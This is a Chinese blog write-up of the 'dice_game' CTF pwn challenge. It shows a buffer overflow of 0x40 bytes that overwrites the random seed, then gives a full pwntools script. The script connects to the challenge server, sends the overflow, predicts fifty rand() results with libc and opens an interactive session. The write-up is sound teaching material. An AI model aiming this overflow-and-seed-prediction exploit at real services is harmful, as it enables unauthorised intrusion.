dice_game

check一下,开了NX和PIE

image.png

拖进ida,发现只要猜对五十次数字,就能过关!随机数有rand函数根据seed种子预测,我们覆盖了seed种子,就能实现预测随机数。image.png
image.png

buf是我们的输入,只要我们的buf再覆盖0x40,我们就可以覆盖到seed
image.png

脚本:

#!usr/bin/python
#coding=utf-8
from pwn import *
from ctypes import *
context.log_level = 'debug'
p = remote('111.198.29.45',37435)
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
payload = "a" * 0x40 + p64(0)
p.recvuntil('name:')
p.sendline(payload)
libc.srand(1)
for i in range(50):
    num = str(libc.rand()%6+1)
    p.recvuntil('point(1~6):')
    p.sendline(num)
p.interactive()
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • QualityforDivisionQ, 打造质领先锋的Q中区|Vote Nick Chen ...
    各位亲爱的头马小伙伴们,你们是否因俱乐部的会议质量而忧心忡忡过?你们是否因俱乐部的会议质量而做过DTM(D...
    Annie_9435阅读 1,140评论 0 10
  • 再见了,我的高中
    再见了,我的高中 人们常说,失去了才会珍惜。如今的我深得体会,高中的我一直憧憬着大学的美好,一直朝着大学奔跑,却忽...
    咚_阅读 388评论 0 0
  • 深夜非
    深夜使人失去智商 脑子被你占满 不安冲刺着我 理智要我把注意力转移 感性叫我把内心话传达 最终感性战胜理智 点开微...
    沉尘尘阅读 680评论 0 0